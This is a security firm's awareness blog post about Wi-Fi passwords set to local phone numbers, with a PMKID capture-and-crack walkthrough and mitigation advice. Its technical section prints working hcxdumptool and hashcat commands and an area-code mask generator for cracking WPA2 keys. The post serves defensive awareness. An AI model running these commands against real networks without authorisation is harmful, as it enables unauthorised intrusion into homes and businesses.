Adversis estimates that 10% of networks in the region are using a password with a 406 area code and phone number, along with an aging Wi-Fi communication protocol. Is your Wi-Fi password your phone number?

It's no secret that many Wi-Fi access points in the northwest Montana region have their network name (SSID) configured as the account holder’s business name or last name and its password set to their 10-digit phone number. Just ask your neighbor.

This may sound acceptable since there are theoretically 10 billion combinations of phone numbers. But consider that Montana has only one area code for the entire state. And there are less than 300 area codes in use in the US.

This reduces the possible guesses from 10^10 (10 billion) to 10^7 (10 million) - that’s a thousand times fewer guesses. And computers can guess very quickly.

Also, consider those free Yellow Pages websites that often disclose your full phone number for free. That Wi-Fi password isn't so secret after all.

So What? What's the Risk?

Why do we have passwords on our Wi-Fi in the first place?

We lock our doors at the office and home. A strong Wi-Fi password restricts access to your computers and devices on your business and home networks to (hopefully) trusted people.

They prevent untrusted people from accessing the dark web and inappropriate content or torrents from your IP address; of which FBI and records labels may use to visit you. Imagine your son's friend borrows your car without permission and causes mayhem, which is caught on camera, and authorities visit you (this did not happen to me).

If you have data caps, your bandwidth can be used up by people free-loading from your connection. Imagine you buy pizza for your family, and the delivery driver eats it before you do (I hate it when this happens).

And What Happens If They Do Connect?

Most devices on your network, both home and business, are very rarely protected or hardened from other devices that can talk to them from the local network.

Many non-enterprise businesses have challenges in understanding where to focus their IT resources, what assets they have, and whether their controls are in place or effective.

This means a malicious person sitting in the parking lot, or on the street can connect to your Wi-Fi network and talk to the computers and devices inside the building or your house.

Once connected, they begin hacking, probing devices for vulnerabilities and weak passwords. Once found, they guess a password or identify a vulnerability, and they're able to connect to a computer or server and obtain its secrets and access data, passwords, and other credentials to email and important websites, furthering their attacks.

These malicious hackers are typically interested in monetizing this access. They primarily do this through ransomware, which locks the computer and scrambles the data until you pay to get it back. Or they first steal the data, then blackmail you to pay, threatening to publish your business data on the dark web.

Another primary way hackers monetize access is to watch your business emails until they see an opportunity to redirect a payment flow and steal money. These Business Email Compromise attacks cost mid-sized businesses, on average, between $40,000 and $80,000. These costs skyrocket the larger your business, and those organizations regulated under HIPAA, PCI, or GLBA (FTC Safeguards Rule).

How do we guess the password to hundreds of networks?

Feel free to skip this technical information and go to the end for how to keep yourself secure.

It's a crime to connect to computer resources without authorization. Only authorized networks were tested during this research.

When you browse a website, your browser makes a request to the web server, and the server responds with information to be displayed on your computer. In a similar way, when your Wi-Fi access point sends out signals to nearby devices, those devices can request information to connect to it. Part of the information the Wi-Fi access point sends back to the device is a code based on the Wi-Fi password. This code can be read by the device asking for it and is used to guess the password.

When your device moves between access points on the same network using the protocol 802.11r, your device identifier, or primary key identifier (PMKID), can be saved or cached in the access point so as the device moves away and then comes back, it can authenticate faster.

Before this attack was identified, a hacker needed to wait for people or devices to connect to the network, wait for certain communication, and generally have certain stars align just right. Now, the information needed to guess passwords can be quickly obtained from information derived from the access point.

PrimaryKey(PMK) = PBKDF2(<Pre-shared key>, <SSID Name>, 4096)

PrimaryKeyID(PMKID) = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

And the steps to do this are quite simple as open-source software takes care of the hard work. If you’re playing along at home with a Wi-Fi network you’re authorized to test, it’s as simple as running a few commands. We won't go into detail on setting up your environment here.

You can capture Wi-Fi information with the hcxdumptool suite and extract password hash material for the password-cracking tools Hashcat or John the Ripper.

# listen to Wi-Fi traffic
sudo hcxdumptool -i wlan0 -w capture.pcap --disable_deauthentication 

# convert hash type for hashcat
hcxpcapngtool -o pmkid_hash.txt capture.pcap

# view ssid and hash information
hcxhashtool --info=stdout -i capture.hash 

As we mentioned, there are less than 300 area codes in the US. Hashcat has a built-in method to iterate through all area codes and every combination of numbers after that through "masks" and hybrid wordlists and mask attacks. For the mask attack, we create a file with each area code followed by 7 digits.

# given a list of area codes
for e in $(cat areacodes.txt); do echo "$e?d?d?d?d?d?d?d"; done | tee areacodes.hcmask

And then execute our password-guessing attack as follows.

.\hashcat.exe -a 3 -m 22000 .\capture.hash areacodelist.txt .\areacode.hcmask

# Alternatively, use a hybrid wordlist + mask attack
hashcat.exe -m 22000 -a 6 areacodelist.txt ?d?d?d?d?d?d?d -o cracked.txt capture.hash 

And after a few minutes on standard workstation hardware, pre-shared Wi-Fi keys are cracked.

122fad3b67c3da3e44d4834fa274cad03:310f6f8f35a52:3f16df234244:Name:406555xxxx

How to Keep Your Wi-Fi Secure

To mitigate the risk of these Wi-Fi attacks, you have a few options. Note that you're not vulnerable to this specific attack if 802.11r roaming and WPA2-Personal mode are not enabled. But this advice still applies.

Upgrade Your Wi-Fi Security Protocol

1. Enable WPA3 security which is the latest Wi-Fi security protocol and prevents the attack outlined above. For specific instructions for your Wi-Fi access point device, see the following links. Your IT provider can typically help.
   1. TP-Link
   2. ASUS ROG
   3. Synology
   4. Netgear
   5. Aruba
   6. Cisco enterprise devices are not affected, according to their information

Use a Better Password

1. Ask your internet service provider or IT provider to make the changes if you’re not managing any aspect of your network. Specifically:
   1. Change your network name (SSID) to be more generic - that is, not your last name
   2. Set the password to a long or random phrase
2. Use long and complex passphrases. Hackers can easily guess thousands of passwords a second, so don’t choose a dictionary word and a number. Choose a memorable sentence or several words separated by a special character, for example.
   1. You can also use https://haveibeenpwned.com/Passwords to see if the password you’re choosing is in a hacked password list.

Use Separate Guest and Employee Networks

Use a guest and work Wi-Fi network to separate your business devices from unauthorized devices. If a compromised host connects to the network your work computers are on, they also become at risk. Your work network should use a long, complex passphrase to prevent guessing or enterprise Wi-Fi protocols.

Keep Your Devices Up to Date

Keep Wi-Fi devices and software up to date. Depending on your provider, this may be done automatically. But if you haven’t bought a new router or Wi-Fi access point recently, you might need to update it manually.

Adversis can help identify your exposure and risk to this issue, helping you protect your assets, operations, and information. Ready to make a change in how you approach cybersecurity and business risk? Let’s connect.

Get in touch today!

Contact: [email protected]

Adversis: https://adversis.io

Adversis ACS: https://acs.adversis.io